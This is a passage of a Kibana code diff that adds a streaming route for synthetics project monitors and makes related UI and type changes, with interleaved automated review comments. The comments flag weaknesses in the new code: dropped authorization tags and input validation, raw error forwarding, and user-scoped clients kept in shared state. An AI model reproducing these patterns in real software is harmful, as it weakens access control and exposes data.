localStorage.setItem(SYNTHETICS_CALLOUT_LS_KEY, 'false'); - -export const SyntheticsCallout = () => { - const [shouldShow, setShouldShow] = useState(shouldShowSyntheticsCallout()); - if (!shouldShow) { - return null; - } - return ( - <> - -

- -

- - - - - - - - { - if (shouldShow) { - hideSyntheticsCallout(); - setShouldShow(false); - } - }} - > - - - - -
- - ); -}; diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx index b32144750705b..6fd6ee19534b5 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx @@ -49,7 +49,6 @@ import { MonitorPageTitle, MonitorPageTitleContent } from './components/monitor/ import { UptimeDatePicker } from './components/common/uptime_date_picker'; import { CertRefreshBtn } from './components/certificates/cert_refresh_btn'; import { CertificateTitle } from './components/certificates/certificate_title'; -import { SyntheticsCallout } from './components/overview/synthetics_callout'; import { StepDetailPageChildren, StepDetailPageHeader, @@ -314,7 +313,6 @@ export const PageRouter: FC = () => { }) => (
- , + Record, + Record +>; + /** * Defines the basic properties employed by Uptime routes. */ export interface UMServerRoute { - method: string; + method: 'GET' | 'PUT' | 'POST' | 'DELETE'; writeAccess?: boolean; handler: T; + streamHandler?: ( + context: UptimeRequestHandlerContext, + request: SyntheticsRequest, + subject: Subject + ) => IKibanaResponse | Promise>; } /** @@ -56,6 +68,7 @@ export type UptimeRoute = UMRouteDefinition; */ export type UMRestApiRouteFactory = (libs: UMServerLibs) => UptimeRoute; export type SyntheticsRestApiRouteFactory = (libs: UMServerLibs) => SyntheticsRoute; +export type SyntheticsStreamingRouteFactory = (libs: UMServerLibs) => SyntheticsStreamingRoute; /** * Functions of this type accept our internal route format and output a route @@ -67,9 +80,10 @@ export type UMKibanaRouteWrapper = ( ) => UMKibanaRoute; export type SyntheticsRoute = UMRouteDefinition; +export type SyntheticsStreamingRoute = UMRouteDefinition; export type SyntheticsRouteWrapper = ( - uptimeRoute: SyntheticsRoute, + uptimeRoute: SyntheticsRoute | SyntheticsStreamingRoute, server: UptimeServerSetup, syntheticsMonitorClient: SyntheticsMonitorClient ) => UMKibanaRoute; @@ -84,13 +98,15 @@ export type UMRouteHandler = ({ response, server, savedObjectsClient, + subject, }: { uptimeEsClient: UptimeESClient; context: UptimeRequestHandlerContext; - request: KibanaRequest, Record, Record>; + request: SyntheticsRequest; response: KibanaResponseFactory; savedObjectsClient: SavedObjectsClientContract; server: UptimeServerSetup; + subject?: Subject; }) => IKibanaResponse | Promise>; export type SyntheticsRouteHandler = ({ 
@@ -100,12 +116,31 @@ export type SyntheticsRouteHandler = ({ response, server, savedObjectsClient, + subject: Subject, }: { uptimeEsClient: UptimeESClient; context: UptimeRequestHandlerContext; - request: KibanaRequest, Record, Record>; + request: SyntheticsRequest; response: KibanaResponseFactory; savedObjectsClient: SavedObjectsClientContract; server: UptimeServerSetup; syntheticsMonitorClient: SyntheticsMonitorClient; + subject?: Subject; +}) => IKibanaResponse | Promise>; + +export type SyntheticsStreamingRouteHandler = ({ + uptimeEsClient, + context, + request, + server, + savedObjectsClient, + subject: Subject, +}: { + uptimeEsClient: UptimeESClient; + context: UptimeRequestHandlerContext; + request: SyntheticsRequest; + savedObjectsClient: SavedObjectsClientContract; + server: UptimeServerSetup; + syntheticsMonitorClient: SyntheticsMonitorClient; + subject?: Subject; }) => IKibanaResponse | Promise>; diff --git a/x-pack/plugins/synthetics/server/plugin.ts b/x-pack/plugins/synthetics/server/plugin.ts index fe323e65cb6dd..209ff9e57face 100644 --- a/x-pack/plugins/synthetics/server/plugin.ts +++ b/x-pack/plugins/synthetics/server/plugin.ts @@ -101,7 +101,7 @@ export class Plugin implements PluginType { initUptimeServer(this.server, plugins, ruleDataClient, this.logger); - initSyntheticsServer(this.server, this.syntheticsMonitorClient); + initSyntheticsServer(this.server, this.syntheticsMonitorClient, plugins); registerUptimeSavedObjects(core.savedObjects, plugins.encryptedSavedObjects); diff --git a/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts b/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts index 9af41b0d87d71..ae218e60e216a 100644 --- a/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts +++ b/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts 
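Review bot: `subject: Subject` inside the destructuring pattern of `SyntheticsRouteHandler` and `SyntheticsStreamingRouteHandler` is a property rename (binding the `subject` key to a local called `Subject`), not a type annotation — the type comes from the object type below. It is harmless in a function type alias but it shadows the imported `Subject` name and reads as an annotation; write it as `subject,` like the other destructured keys. `SyntheticsStreamingRouteHandler` also removes `response` yet keeps `subject?: Subject` optional, leaving a handler invoked without a subject with no channel to answer on; if the route wrapper always supplies one, declaring it as `subject: Subject` documents that contract.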
@@ -8,13 +8,14 @@ import { UMServerLibs } from '../legacy_uptime/lib/lib'; import { SyntheticsRestApiRouteFactory, + SyntheticsStreamingRouteFactory, SyntheticsRoute, SyntheticsRouteHandler, } from '../legacy_uptime/routes'; export const createSyntheticsRouteWithAuth = ( libs: UMServerLibs, - routeCreator: SyntheticsRestApiRouteFactory + routeCreator: SyntheticsRestApiRouteFactory | SyntheticsStreamingRouteFactory ): SyntheticsRoute => { const restRoute = routeCreator(libs); const { handler, method, path, options, ...rest } = restRoute; diff --git a/x-pack/plugins/synthetics/server/routes/index.ts b/x-pack/plugins/synthetics/server/routes/index.ts index 2b6ca12e56b18..4190943a1acf2 100644 --- a/x-pack/plugins/synthetics/server/routes/index.ts +++ b/x-pack/plugins/synthetics/server/routes/index.ts @@ -26,10 +26,12 @@ import { installIndexTemplatesRoute } from './synthetics_service/install_index_t import { editSyntheticsMonitorRoute } from './monitor_cruds/edit_monitor'; import { addSyntheticsMonitorRoute } from './monitor_cruds/add_monitor'; import { addSyntheticsProjectMonitorRoute } from './monitor_cruds/add_monitor_project'; -import { SyntheticsRestApiRouteFactory } from '../legacy_uptime/routes'; +import { + SyntheticsRestApiRouteFactory, + SyntheticsStreamingRouteFactory, +} from '../legacy_uptime/routes'; export const syntheticsAppRestApiRoutes: SyntheticsRestApiRouteFactory[] = [ - addSyntheticsProjectMonitorRoute, addSyntheticsMonitorRoute, getSyntheticsEnablementRoute, deleteSyntheticsMonitorRoute, @@ -47,3 +49,7 @@ export const syntheticsAppRestApiRoutes: SyntheticsRestApiRouteFactory[] = [ getAPIKeySyntheticsRoute, createGetMonitorStatusRoute, ]; + +export const syntheticsAppStreamingApiRoutes: SyntheticsStreamingRouteFactory[] = [ + addSyntheticsProjectMonitorRoute, +]; 
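Review bot: `createSyntheticsRouteWithAuth` now accepts a `SyntheticsStreamingRouteFactory` but still declares its return type as `SyntheticsRoute` and destructures `handler` from the result as before, so a streaming route is typed into the REST shape whose handler is expected to return a response. If the body (which continues outside the hunk) does not distinguish the two factories, a streaming route registered through this helper would be invoked without a subject and never send a reply; a comment stating which wrapper each kind of route must go through, or a narrowed return type `SyntheticsRoute | SyntheticsStreamingRoute`, would make the expectation explicit.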
diff --git a/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts b/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts index 87f0791156869..0cb817599b165 100644 --- a/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts +++ b/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts @@ -8,12 +8,12 @@ import { schema } from '@kbn/config-schema'; import { UMServerLibs } from '../../legacy_uptime/lib/lib'; import { ProjectBrowserMonitor } from '../../../common/runtime_types'; -import { SyntheticsRestApiRouteFactory } from '../../legacy_uptime/routes/types'; +import { SyntheticsStreamingRouteFactory } from '../../legacy_uptime/routes/types'; import { API_URLS } from '../../../common/constants'; import { getAllLocations } from '../../synthetics_service/get_all_locations'; import { ProjectMonitorFormatter } from '../../synthetics_service/project_monitor_formatter'; -export const addSyntheticsProjectMonitorRoute: SyntheticsRestApiRouteFactory = ( +export const addSyntheticsProjectMonitorRoute: SyntheticsStreamingRouteFactory = ( libs: UMServerLibs ) => ({ method: 'PUT', 
@@ -27,46 +27,51 @@ export const addSyntheticsProjectMonitorRoute: SyntheticsRestApiRouteFactory = ( }, handler: async ({ request, - response, savedObjectsClient, server, syntheticsMonitorClient, + subject, }): Promise => { - const monitors = (request.body?.monitors as ProjectBrowserMonitor[]) || []; - const spaceId = server.spaces.spacesService.getSpaceId(request); - const { keep_stale: keepStale, project: projectId } = request.body || {}; - const { publicLocations, privateLocations } = await getAllLocations( - server, - syntheticsMonitorClient, - savedObjectsClient - ); - const encryptedSavedObjectsClient = server.encryptedSavedObjects.getClient(); + try { + const monitors = (request.body?.monitors as ProjectBrowserMonitor[]) || []; + const spaceId = server.spaces.spacesService.getSpaceId(request); + const { keep_stale: keepStale, project: projectId } = request.body || {}; + const { publicLocations, privateLocations } = await getAllLocations( + server, + syntheticsMonitorClient, + savedObjectsClient + ); + const encryptedSavedObjectsClient = server.encryptedSavedObjects.getClient(); - const pushMonitorFormatter = new ProjectMonitorFormatter({ - projectId, - spaceId, - keepStale, - locations: publicLocations, - privateLocations, - encryptedSavedObjectsClient, - savedObjectsClient, - monitors, - server, - syntheticsMonitorClient, - request, - }); + const pushMonitorFormatter = new ProjectMonitorFormatter({ + projectId, + spaceId, + keepStale, + locations: publicLocations, + privateLocations, + encryptedSavedObjectsClient, + savedObjectsClient, + monitors, + server, + syntheticsMonitorClient, + request, + subject, + }); - await pushMonitorFormatter.configureAllProjectMonitors(); + await pushMonitorFormatter.configureAllProjectMonitors(); - return response.ok({ - body: { + subject?.next({ createdMonitors: pushMonitorFormatter.createdMonitors, updatedMonitors: pushMonitorFormatter.updatedMonitors, staleMonitors: pushMonitorFormatter.staleMonitors, deletedMonitors: 
pushMonitorFormatter.deletedMonitors, failedMonitors: pushMonitorFormatter.failedMonitors, failedStaleMonitors: pushMonitorFormatter.failedStaleMonitors, - }, - }); + }); + } catch (error) { + subject?.error(error); + } finally { + subject?.complete(); + } }, }); diff --git a/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts b/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts index b321635d3f569..6c247dde94c04 100644 --- a/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts +++ b/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts @@ -12,9 +12,11 @@ export const getServiceAllowedRoute: SyntheticsRestApiRouteFactory = () => ({ method: 'GET', path: API_URLS.SERVICE_ALLOWED, validate: {}, - handler: async ({ syntheticsMonitorClient }): Promise => { + handler: async ({ syntheticsMonitorClient, server }): Promise => { + const isCloud = Boolean(server.cloud?.isCloudEnabled); + return { - serviceAllowed: syntheticsMonitorClient.syntheticsService.isAllowed, + serviceAllowed: isCloud ? syntheticsMonitorClient.syntheticsService.isAllowed : true, signupUrl: syntheticsMonitorClient.syntheticsService.signupUrl, }; }, diff --git a/x-pack/plugins/synthetics/server/server.ts b/x-pack/plugins/synthetics/server/server.ts index a4821c29759e8..12844c9cb9223 100644 --- a/x-pack/plugins/synthetics/server/server.ts +++ b/x-pack/plugins/synthetics/server/server.ts 
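Review bot: `subject?.error(error)` in the new catch block forwards the raw exception to the stream consumer, so whatever bfetch serializes from it (message and possibly stack or Elasticsearch error bodies from `getAllLocations` or the saved-objects calls) reaches the client; the per-monitor failures already expose `e.message` deliberately, but this path catches everything else too. Log it server-side and emit a sanitized error instead: `server.logger.error(error); subject?.error(new Error('Failed to configure project monitors'));`. Note also that `request.body?.monitors as ProjectBrowserMonitor[]` is only as safe as the route's `validate` schema, which sits above this hunk and — given that the streaming registration in server.ts hands only `path` and `method` to bfetch — may not be enforced on the streaming path; worth confirming. `createSyntheticsRouteWithAuth` and `ProjectMonitorFormatter`, which this handler relies on, are outside the hunk.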
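Review bot: On self-managed deployments `serviceAllowed` is now unconditionally `true`, so `syntheticsMonitorClient.syntheticsService.isAllowed` no longer influences this response there; if any caller treats the flag as an authorization decision rather than a UI hint, that gating has to be enforced on the routes that actually use the service. A comment would keep the next reader from "fixing" it back: `// The service allow-list only applies on Cloud; self-managed deployments are always allowed here.`. The condition also reads more directly as `serviceAllowed: !isCloud || syntheticsMonitorClient.syntheticsService.isAllowed,`.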
@@ -4,18 +4,21 @@
 * 2.0; you may not use this file except in compliance with the Elastic License
 * 2.0.
 */
-
+import { Subject } from 'rxjs';
+import { UptimeRequestHandlerContext } from './types';
 import { createSyntheticsRouteWithAuth } from './routes/create_route_with_auth';
 import { SyntheticsMonitorClient } from './synthetics_service/synthetics_monitor/synthetics_monitor_client';
 import { syntheticsRouteWrapper } from './synthetics_route_wrapper';
 import { uptimeRequests } from './legacy_uptime/lib/requests';
-import { syntheticsAppRestApiRoutes } from './routes';
-import { UptimeServerSetup } from './legacy_uptime/lib/adapters';
+import { syntheticsAppRestApiRoutes, syntheticsAppStreamingApiRoutes } from './routes';
+import { UptimeServerSetup, UptimeCorePluginsSetup } from './legacy_uptime/lib/adapters';
 import { licenseCheck } from './legacy_uptime/lib/domains';
+import type { SyntheticsRequest } from './legacy_uptime/routes/types';

 export const initSyntheticsServer = (
 server: UptimeServerSetup,
- syntheticsMonitorClient: SyntheticsMonitorClient
+ syntheticsMonitorClient: SyntheticsMonitorClient,
+ plugins: UptimeCorePluginsSetup
 ) => {
 const libs = {
 requests: uptimeRequests,
@@ -52,4 +55,34 @@ export const initSyntheticsServer = (
 throw new Error(`Handler for method ${method} is not defined`);
 }
 });
+
+ syntheticsAppStreamingApiRoutes.forEach((route) => {
+ const { method, streamHandler, path } = syntheticsRouteWrapper(
+ createSyntheticsRouteWithAuth(libs, route),
+ server,
+ syntheticsMonitorClient
+ );
+
+ plugins.bfetch.addStreamingResponseRoute(
+ path,
+ (request, context) => {
+ return {
+ getResponseStream: ({ data }: any) => {
+ const subject = new Subject();
+
+ if (streamHandler) {
+ streamHandler(
+ context as UptimeRequestHandlerContext,
+ request as SyntheticsRequest,
+ subject
+ );
+ }
+ return subject;
+ },
+ };
+ },
+ method,
+ server.router
+ );
+ });
 };
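Review bot: `streamHandler(...)` inside `getResponseStream` is an async call whose promise is neither awaited nor caught, so a rejection raised before the route's own try/catch (the `await context.core`, `uiSettings.client.get` and `createUptimeESClient` calls in `syntheticsRouteWrapper`'s streamHandler all run first) becomes an unhandled rejection and `subject` is never errored or completed — the client simply hangs. Terminate the stream on failure: `streamHandler(context as UptimeRequestHandlerContext, request as SyntheticsRequest, subject).catch((err) => subject.error(err));`. Separately, the destructuring `const { method, streamHandler, path }` discards `options` — including the `access:uptime-read`/`access:uptime-write` tags the wrapper attaches — and the route's `validate` schema, and neither is passed to `plugins.bfetch.addStreamingResponseRoute`; unless bfetch applies equivalent tags itself, this route is registered with weaker authorization and input validation than its REST siblings, which should be verified and, if intentional, documented here. Minor: `data` is unused and `new Subject()` infers `Subject<unknown>` only by accident; type it explicitly.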
diff --git a/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts b/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts index a5e28aa051b98..8706735fa9256 100644 --- a/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts +++ b/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts @@ -4,12 +4,11 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ - import { KibanaResponse } from '@kbn/core-http-router-server-internal'; import { enableInspectEsQueries } from '@kbn/observability-plugin/common'; import { createUptimeESClient, inspectableEsQueriesMap } from './legacy_uptime/lib/lib'; import { syntheticsServiceApiKey } from './legacy_uptime/lib/saved_objects/service_api_key'; -import { SyntheticsRouteWrapper } from './legacy_uptime/routes'; +import { SyntheticsRouteWrapper, SyntheticsStreamingRouteHandler } from './legacy_uptime/routes'; import { API_URLS } from '../common/constants'; export const syntheticsRouteWrapper: SyntheticsRouteWrapper = ( 
@@ -21,6 +20,48 @@ export const syntheticsRouteWrapper: SyntheticsRouteWrapper = (
 options: {
 tags: ['access:uptime-read', ...(uptimeRoute?.writeAccess ? ['access:uptime-write'] : [])],
 },
+ streamHandler: async (context, request, subject) => {
+ const coreContext = await context.core;
+ const { client: esClient } = coreContext.elasticsearch;
+ const savedObjectsClient = coreContext.savedObjects.getClient({
+ includedHiddenTypes: [syntheticsServiceApiKey.name],
+ });
+
+ // specifically needed for the synthetics service api key generation
+ server.authSavedObjectsClient = savedObjectsClient;
+
+ const isInspectorEnabled = await coreContext.uiSettings.client.get(
+ enableInspectEsQueries
+ );
+
+ const uptimeEsClient = createUptimeESClient({
+ request,
+ savedObjectsClient,
+ isInspectorEnabled,
+ esClient: esClient.asCurrentUser,
+ });
+
+ server.uptimeEsClient = uptimeEsClient;
+
+ if (
+ (isInspectorEnabled || server.isDev) &&
+ server.config.service?.username !== 'localKibanaIntegrationTestsUser'
+ ) {
+ inspectableEsQueriesMap.set(request, []);
+ }
+
+ const res = await (uptimeRoute.handler as SyntheticsStreamingRouteHandler)({
+ uptimeEsClient,
+ savedObjectsClient,
+ context,
+ request,
+ server,
+ syntheticsMonitorClient,
+ subject,
+ });
+
+ return res;
+ },
 handler: async (context, request, response) => {
 const coreContext = await context.core;
 const { client: esClient } = coreContext.elasticsearch;
diff --git a/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts b/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts
index 565d509a8e5c9..3067ee6319052 100644
--- a/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts
+++ b/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts
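Review bot: The new `streamHandler` repeats the REST handler's practice of storing request-scoped, user-scoped clients on the shared `server` object (`server.authSavedObjectsClient = savedObjectsClient;` and `server.uptimeEsClient = uptimeEsClient;`), so this process-wide state is now written from a second code path; because `savedObjectsClient` is obtained from `coreContext` for the calling user, two concurrent requests can overwrite each other and a later reader of `authSavedObjectsClient` may act with another user's privileges. `savedObjectsClient` is already passed to the handler explicitly, so the API-key generation the comment refers to should take it as an argument rather than read it from `server`; until then the comment should carry the caveat: `// WARNING: process-wide and overwritten per request; not safe under concurrent requests.`. The two handlers also share their first ~25 lines verbatim; a small `buildRouteContext(context, request)` helper returning `{ uptimeEsClient, savedObjectsClient }` would keep them from diverging. The enclosing `syntheticsRouteWrapper` function and the REST `handler` body continue outside the hunk.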
@@ -4,6 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ +import type { Subject } from 'rxjs'; import { isEqual } from 'lodash'; import { KibanaRequest } from '@kbn/core/server'; import { @@ -63,6 +64,7 @@ export class ProjectMonitorFormatter { private projectFilter: string; private syntheticsMonitorClient: SyntheticsMonitorClient; private request: KibanaRequest; + private subject?: Subject; constructor({ locations, @@ -76,6 +78,7 @@ export class ProjectMonitorFormatter { server, syntheticsMonitorClient, request, + subject, }: { locations: Locations; privateLocations: Locations; @@ -88,6 +91,7 @@ export class ProjectMonitorFormatter { server: UptimeServerSetup; syntheticsMonitorClient: SyntheticsMonitorClient; request: KibanaRequest; + subject?: Subject; }) { this.projectId = projectId; this.spaceId = spaceId; @@ -101,6 +105,7 @@ export class ProjectMonitorFormatter { this.server = server; this.projectFilter = `${syntheticsMonitorType}.attributes.${ConfigKey.PROJECT_ID}: "${this.projectId}"`; this.request = request; + this.subject = subject; } public configureAllProjectMonitors = async () => { 
@@ -158,23 +163,11 @@ export class ProjectMonitorFormatter { if (this.staleMonitorsMap[monitor.id]) { this.staleMonitorsMap[monitor.id].stale = false; } + this.handleStreamingMessage({ message: `${monitor.id}: monitor updated successfully` }); } else { - const newMonitor = await this.savedObjectsClient.create( - syntheticsMonitorType, - formatSecrets({ - ...normalizedMonitor, - revision: 1, - }) - ); - await syncNewMonitor({ - server: this.server, - monitor: normalizedMonitor, - monitorSavedObject: newMonitor, - syntheticsMonitorClient: this.syntheticsMonitorClient, - savedObjectsClient: this.savedObjectsClient, - request: this.request, - }); + await this.createMonitor(normalizedMonitor); this.createdMonitors.push(monitor.id); + this.handleStreamingMessage({ message: `${monitor.id}: monitor created successfully` }); } } catch (e) { this.server.logger.error(e); @@ -184,6 +177,7 @@ export class ProjectMonitorFormatter { details: e.message, payload: monitor, }); + this.handleStreamingMessage({ message: `${monitor.id}: failed to create or update monitor` }); if (this.staleMonitorsMap[monitor.id]) { this.staleMonitorsMap[monitor.id].stale = false; } @@ -235,6 +229,24 @@ export class ProjectMonitorFormatter { return savedObjects?.[0]; }; + private createMonitor = async (normalizedMonitor: BrowserFields) => { + const newMonitor = await this.savedObjectsClient.create( + syntheticsMonitorType, + formatSecrets({ + ...normalizedMonitor, + revision: 1, + }) + ); + await syncNewMonitor({ + server: this.server, + monitor: normalizedMonitor, + monitorSavedObject: newMonitor, + syntheticsMonitorClient: this.syntheticsMonitorClient, + savedObjectsClient: this.savedObjectsClient, + request: this.request, + }); + }; + private updateMonitor = async ( previousMonitor: SavedObjectsFindResult, normalizedMonitor: BrowserFields 
@@ -325,12 +337,20 @@ export class ProjectMonitorFormatter { request: this.request, }); this.deletedMonitors.push(journeyId); + this.handleStreamingMessage({ message: `Monitor ${journeyId} deleted successfully` }); } catch (e) { + this.handleStreamingMessage({ message: `Monitor ${journeyId} could not be deleted` }); this.failedStaleMonitors.push({ - id: monitorId, + id: journeyId, reason: 'Failed to delete stale monitor', details: e.message, }); } }; + + private handleStreamingMessage = async ({ message }: { message: string }) => { + if (this.subject) { + this.subject?.next(message); + } + }; } diff --git a/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts b/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts index e0e7ddd3e79a4..a16e01189f4c7 100644 --- a/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts +++ b/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts @@ -7,7 +7,7 @@ import { merge, of, Observable } from 'rxjs'; import { map, scan } from 'rxjs/operators'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { Logger } from '@kbn/core/server'; import { JsonObject } from '@kbn/utility-types'; import { TaskStore } from '../task_store'; diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx index 8eed98a65a918..1aa17259ddd82 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx @@ -42,7 +42,6 @@ export function WithIndicators() { return ( ); } + +export function Loading() { + return ( + + ); +} 
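Review bot: `handleStreamingMessage` is declared `async` although it only calls `subject.next`, so every call site in this class fires a promise nobody awaits, and the `if (this.subject)` guard makes the inner `this.subject?.next` optional chain redundant; `private handleStreamingMessage = ({ message }: { message: string }) => { this.subject?.next(message); };` says the same in one synchronous line. The stream now carries plain progress strings followed (from the route handler) by a single summary object, so consumers must discriminate on value type; a comment on the `subject` constructor parameter, `// receives string progress messages; the route emits the final summary object itself`, would record that contract. The class continues outside the hunk.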
diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx index 7eeb78a0753cc..1014e797c21cb 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx @@ -21,7 +21,6 @@ const tableProps: IndicatorsTableProps = { indicators: [], pagination: { pageSize: 10, pageIndex: 0, pageSizeOptions: [10] }, indicatorCount: 0, - firstLoad: false, loading: false, indexPatterns: [], }; @@ -42,11 +41,11 @@ const indicatorsFixture: Indicator[] = [ ]; describe('', () => { - it('should render loading spinner on first load', async () => { + it('should render loading spinner when loading', async () => { await act(async () => { render( - + ); }); @@ -54,13 +53,13 @@ describe('', () => { expect(screen.queryByRole('progressbar')).toBeInTheDocument(); }); - it('should render datagrid when first load is done', async () => { + it('should render datagrid when loading is done', async () => { await act(async () => { render( diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx index 996c702bcf8ae..b8b1f879e0f29 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx 
@@ -6,7 +6,14 @@ */ import React, { VFC, useState, useMemo } from 'react'; -import { EuiDataGrid, EuiLoadingSpinner, EuiText } from '@elastic/eui'; +import { + EuiDataGrid, + EuiFlexGroup, + EuiFlexItem, + EuiLoadingSpinner, + EuiPanel, + EuiText, +} from '@elastic/eui'; import { FormattedMessage } from '@kbn/i18n-react'; import { i18n } from '@kbn/i18n'; @@ -24,6 +31,12 @@ interface Column { } const columns: Column[] = [ + { + id: RawIndicatorFieldId.TimeStamp, + displayAsText: i18n.translate('xpack.threatIntelligence.indicator.table.timestampColumnTitle', { + defaultMessage: '@timestamp', + }), + }, { id: ComputedIndicatorFieldId.DisplayValue, displayAsText: i18n.translate('xpack.threatIntelligence.indicator.table.indicatorColumTitle', { @@ -57,15 +70,6 @@ const columns: Column[] = [ defaultMessage: 'Last seen', }), }, - { - id: RawIndicatorFieldId.MarkingTLP, - displayAsText: i18n.translate( - 'xpack.threatIntelligence.indicator.table.tlpMarketingColumTitle', - { - defaultMessage: 'TLP Marking', - } - ), - }, ]; export type IndicatorsTableProps = Omit & { @@ -80,7 +84,6 @@ export const IndicatorsTable: VFC = ({ onChangePage, onChangeItemsPerPage, pagination, - firstLoad, loading, indexPatterns, }) => { @@ -141,11 +144,19 @@ export const IndicatorsTable: VFC = ({ [renderCellValue] ); - if (firstLoad) { - return ; + if (loading) { + return ( + + + + + + + + ); } - if (!loading && !indicatorCount) { + if (!indicatorCount) { return ; } diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts b/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts index f416cfc946a5d..a1fc3cf94c290 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts 
@@ -35,7 +35,6 @@ export interface UseIndicatorsValue { pagination: Pagination; onChangeItemsPerPage: (value: number) => void; onChangePage: (value: number) => void; - firstLoad: boolean; loading: boolean; } @@ -73,7 +72,6 @@ export const useIndicators = ({ const [indicators, setIndicators] = useState([]); const [indicatorCount, setIndicatorCount] = useState(0); - const [firstLoad, setFirstLoad] = useState(true); const [loading, setLoading] = useState(true); const [pagination, setPagination] = useState({ @@ -148,14 +146,12 @@ export const useIndicators = ({ searchSubscription$.current?.unsubscribe(); } - setFirstLoad(false); setLoading(false); }, error: (msg) => { searchService.showError(msg); searchSubscription$.current?.unsubscribe(); - setFirstLoad(false); setLoading(false); }, }); @@ -201,7 +197,6 @@ export const useIndicators = ({ pagination, onChangePage, onChangeItemsPerPage, - firstLoad, loading, handleRefresh, }; diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx index 178c58bc02641..81a3698edef3c 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx @@ -32,10 +32,9 @@ const stub = () => {}; describe('', () => { beforeAll(() => { (useIndicators as jest.MockedFunction).mockReturnValue({ - indicators: [], - indicatorCount: 0, - firstLoad: false, - loading: true, + indicators: [{ fields: {} }], + indicatorCount: 1, + loading: false, pagination: { pageIndex: 0, pageSize: 10, pageSizeOptions: [10] }, onChangeItemsPerPage: stub, onChangePage: stub, 
diff --git a/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts b/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts index c02e8eb2f4487..2d7096a211a7f 100644 --- a/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts +++ b/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get } from 'lodash/fp'; import { Ecs } from '../../../../../common/ecs'; import { Fields } from '../../../../../common/search_strategy'; diff --git a/x-pack/plugins/transform/common/types/pivot_aggs.ts b/x-pack/plugins/transform/common/types/pivot_aggs.ts index 44308940a5870..a720e4bbeb4ba 100644 --- a/x-pack/plugins/transform/common/types/pivot_aggs.ts +++ b/x-pack/plugins/transform/common/types/pivot_aggs.ts @@ -5,8 +5,8 @@ * 2.0. */ +import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import { AggName } from './aggregations'; -import { EsFieldName } from './fields'; export const PIVOT_SUPPORTED_AGGS = { AVG: 'avg', @@ -23,11 +23,7 @@ export const PIVOT_SUPPORTED_AGGS = { export type PivotSupportedAggs = typeof PIVOT_SUPPORTED_AGGS[keyof typeof PIVOT_SUPPORTED_AGGS]; -export type PivotAgg = { - [key in PivotSupportedAggs]?: { - field: EsFieldName; - }; -}; +export type PivotAgg = estypes.AggregationsAggregationContainer; export type PivotAggDict = { [key in AggName]: PivotAgg; diff --git a/x-pack/plugins/transform/public/app/common/index.ts 